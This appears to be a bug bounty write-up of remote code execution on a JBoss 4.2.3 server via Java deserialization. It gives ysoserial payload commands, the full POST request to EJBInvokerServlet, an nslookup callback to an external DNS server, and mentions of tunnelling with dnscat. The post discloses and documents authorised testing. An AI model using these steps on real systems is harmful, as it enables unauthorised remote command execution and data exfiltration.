Utilizing SSRF to Pivot Internal Networks

This is from a private bounty. The internal —-private.com domain was out of scope so I was asked to stop testing once I found the bug.

SSRF To Pivot Internal Networks

Utilizing SSRF to Pivot Internal Networks

Exploiting Java Deserialization Via JBoss


First off, I would just like to reference the following sites/authors/tools for helping guide me along this route and providing a sweet tool to make this easy:

I ran into a JMXInvokerServlet/EJBInvokerServlet on a private bug bounty. Generally with these, you can just deploy a JSP shell and be done with it. I was running into some issues with this method and I’m not exactly sure why. However, I was still able to get RCE via this version of JBoss (4.2.3) being vulnerable to the Java Deserialization issue. There was egress filtering on this Windows host that didn’t allow me to perform http, ftp, or telnet. I was able to do DNS lookups though which will be shown at the end. I was able to determine it was a windows host due to some file not found-ish error messages.

Steps to Exploit

  1. Grab a copy of ysoserial
  2. Dump your payload into a file:
    $ java -jar ysoserial-0.0.4-all.jar CommonsCollections1 ‘fake.exe’ > serialdata
  3. If you’ll notice, I used ‘fake.exe’ as an example. Originally I was running commands like wget, curl, python, perl, etc. and I would receive some errors in the serialized response, “The system cannot find the file specified.”
  4. To create your POST request for the endpoint use the following headers:
    POST /invoker/EJBInvokerServlet HTTP/1.1
    Host: site.com
    Accept: */*
    Accept-Language: en
    ContentType: application/x-java-serialized-object; class=org.jboss.invocation.MarshalledInvocation
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Content-Length: 1400
  5. Right click inside the request tab in Repeater and select ‘Paste from file’ and select the file containing serialized data.
    Screen Shot 2016-07-22 at 10.23.28 AM
  6. Response (‘cannot find file’ is present):
    Screen Shot 2016-07-22 at 10.28.40 AM.png
  7. I then decided to try cmd.exe
    $ java -jar ysoserial-0.0.4-all.jar CommonsCollections1 ‘cmd.exe’ > serialdata
  8. Request:
    Screen Shot 2016-07-22 at 10.26.29 AM.png
  9. Response (‘cannot find file’ is not present):
    Screen Shot 2016-07-22 at 10.27.30 AM
  10. From these responses, we can gather that I am able to run cmd.exe. At this point I tried a couple ways of outbound connections; however, I was only able to get DNS lookups to work. Thank you @dawgyg for letting me use your DNS server!
  11. Command:
    $ java -jar ysoserial-0.0.4-all.jar CommonsCollections1 ‘nslookup mealstest.example.com’ > serialtest
  12. External DNS server logs:
    $ sudo tail -f /var/log/messages

    Jul 22 00:10:00 server named[7356]: client 18x.x.x.x#33347: query: mealstest.example.com IN A -EDC (

  13. I suspect I might have been able to copy over dnscat line by line then run the code. However I am short on time and the RCE was already proven .
Exploiting Java Deserialization Via JBoss